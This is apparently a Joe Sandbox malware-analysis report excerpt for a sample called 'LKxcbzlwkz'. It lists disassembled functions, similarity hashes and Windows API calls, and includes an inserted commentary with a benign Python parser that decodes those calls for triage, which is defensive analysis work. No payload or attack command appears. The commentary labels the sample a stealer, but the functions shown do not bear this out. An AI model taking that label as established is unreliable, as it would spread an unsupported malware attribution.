                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                            • API String ID: 621800784-4108050209
                                                                                                                                                                                                                                                            • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                                                                                                                                                                                                            • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32 ref: 004781CE
                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                                                                                                                                                                                                              • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(?), ref: 00478340
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                                                                                                                                                                                                                            • String ID: \VH
                                                                                                                                                                                                                                                            • API String ID: 3884216118-234962358
                                                                                                                                                                                                                                                            • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                                                                                                                                                                                            • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                                                                                                                                                                                                                            APIs
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
• IsMenu.USER32(?), ref: 0044854D
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
• DrawMenuBar.USER32 ref: 004485AF
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Menu$Item$DrawInfoInsert
• String ID: 0
• API String ID: 3076010158-4108050209
• Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
• Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
• Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
• Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
APIs
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
• SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: MessageSend$_memmove_wcslen
• String ID: ComboBox$ListBox
• API String ID: 1589278365-1403004172
• Opcode ID: 2982a8b4e132ea2dcbe32ac967b71e6e496619b6b285040aa1baae5d263946ef
• Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
• Opcode Fuzzy Hash: 2982a8b4e132ea2dcbe32ac967b71e6e496619b6b285040aa1baae5d263946ef
• Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
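The "APIs" entries in this report are easier to triage once the numeric arguments are decoded: 0x188/0x18A/0x189 sent to a window are LB_GETCURSEL, LB_GETTEXTLEN and LB_GETTEXT (read the selected list box entry), GetStdHandle(-10) asks for STD_INPUT_HANDLE, and Shell_NotifyIconW(1, ...) is NIM_MODIFY. Functions that only do this are ordinary GUI plumbing of the host executable and can be deprioritised in favour of the stealer logic. The following is an added example, not part of the Joe Sandbox report: a parser for the "APIs" line format used above plus a decoder for those constants. The sample input is constructed by copying entries from the function blocks on this page; the constant values are from the public Windows SDK headers; the assumption that the report prints the negative DWORD argument of GetStdHandle truncated to its low byte is mine.

```python
import re
from typing import NamedTuple, Optional, List, Tuple

# Constructed sample: "APIs" entries copied from the function blocks above
# (two different functions' calls merged into one list for the demo).
SAMPLE_APIS = """
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
• SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
• GetStdHandle.KERNEL32(000000F6), ref: 0044337D
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
• DrawMenuBar.USER32 ref: 004485AF
"""


class ApiCall(NamedTuple):
    api: str
    module: str
    args: Tuple[str, ...]   # raw argument tokens as printed ('?' = unknown)
    ref: int                # call-site address from "ref:"
    caller: Optional[int]   # set for "Part of subcall function" entries


# One report line: optional subcall prefix, Api.MODULE, optional (args), ", ref: ADDR".
_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


def parse_api_lines(text: str) -> List[ApiCall]:
    """Turn the report's 'APIs' bullet lines into structured records."""
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue  # headers such as "Strings" or unrelated lines
        raw = m.group("args")
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        calls.append(ApiCall(
            api=m.group("api"),
            module=m.group("module"),
            args=args,
            ref=int(m.group("ref"), 16),
            caller=int(m.group("caller"), 16) if m.group("caller") else None,
        ))
    return calls


# Windows SDK constants for the arguments that carry meaning in these calls.
LB_MESSAGES = {
    0x0188: "LB_GETCURSEL",
    0x0189: "LB_GETTEXT",
    0x018A: "LB_GETTEXTLEN",
    0x018B: "LB_GETCOUNT",
}
# STD_*_HANDLE are (DWORD)-10/-11/-12; keyed by low byte because the report
# shows the value as 000000F6 (assumption: the display truncates it).
STD_HANDLES = {0xF6: "STD_INPUT_HANDLE", 0xF5: "STD_OUTPUT_HANDLE", 0xF4: "STD_ERROR_HANDLE"}
NIM_ACTIONS = {0: "NIM_ADD", 1: "NIM_MODIFY", 2: "NIM_DELETE"}


def _hex_arg(call: ApiCall, index: int) -> Optional[int]:
    """Argument at index as an int, or None when absent or printed as '?'."""
    try:
        return int(call.args[index], 16)
    except (IndexError, ValueError):
        return None


def describe(call: ApiCall) -> str:
    """Readable form of one call, decoding the constants where known."""
    if call.api == "SendMessageW":
        msg = _hex_arg(call, 1)
        if msg is None:
            return "SendMessageW -> msg ?"
        return f"SendMessageW -> {LB_MESSAGES.get(msg, f'msg 0x{msg:04X}')}"
    if call.api == "GetStdHandle":
        h = _hex_arg(call, 0)
        name = STD_HANDLES.get(h & 0xFF, f"0x{h:08X}") if h is not None else "?"
        return f"GetStdHandle -> {name}"
    if call.api == "Shell_NotifyIconW":
        act = _hex_arg(call, 0)
        name = NIM_ACTIONS.get(act, f"0x{act:X}") if act is not None else "?"
        return f"Shell_NotifyIconW -> {name}"
    return f"{call.api}.{call.module}"


def summarize(text: str) -> List[str]:
    """Decoded description of every direct (non-subcall) API entry in the text."""
    return [describe(c) for c in parse_api_lines(text) if c.caller is None]


if __name__ == "__main__":
    for line in summarize(SAMPLE_APIS):
        print(line)
```

Run stand-alone it prints one decoded line per direct call; subcall entries are kept in the parsed records (with `caller` set) but left out of the summary because they belong to the callee, not the function being triaged.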
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Handle
• String ID: nul
• API String ID: 2519475695-2873401336
• Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
• Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
• Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
• Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 0044337D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Handle
• String ID: nul
• API String ID: 2519475695-2873401336
• Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
• Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
• Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
• Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
APIs
• LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
• _wcsncpy.LIBCMT ref: 00401C41
• _wcscpy.LIBCMT ref: 00401C5D
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                                                                                                                                                                                                                            • String ID: Line:
                                                                                                                                                                                                                                                            • API String ID: 1874344091-1585850449
                                                                                                                                                                                                                                                            • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                                                                                                                                                                                            • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID:
• String ID: SysAnimate32
• API String ID: 0-1011021900
• Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
• Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
• Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
• Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
APIs
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
  • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
  • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
  • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
  • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
• GetFocus.USER32 ref: 0046157B
  • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
  • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
• GetClassNameW.USER32(?,?,00000100), ref: 004615C4
• EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
• __swprintf.LIBCMT ref: 00461608
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
• String ID: %s%d
• API String ID: 2645982514-1110647743
• Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
• Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
• Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
• Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
• Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
• Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
• Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
APIs
• GetCurrentProcessId.KERNEL32(?), ref: 0047584D
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
• CloseHandle.KERNEL32(00000000), ref: 00475A4D
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Process$CloseCountersCurrentHandleOpen
• String ID:
• API String ID: 3488606520-0
APIs
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: ConnectRegistry_memmove_wcslen
• String ID:
• API String ID: 15295421-0
APIs
• LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
• GetProcAddress.KERNEL32(?,?), ref: 004648F7
• GetProcAddress.KERNEL32(?,00000000), ref: 00464916
• GetProcAddress.KERNEL32(?,?), ref: 0046495A
• FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: AddressProc$Library$FreeLoad
• String ID:
• API String ID: 2449869053-0
APIs
• GetCursorPos.USER32(?), ref: 004563A6
• ScreenToClient.USER32(?,?), ref: 004563C3
• GetAsyncKeyState.USER32(?), ref: 00456400
• GetAsyncKeyState.USER32(?), ref: 00456410
• GetWindowLongW.USER32(?,000000F0), ref: 00456466
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
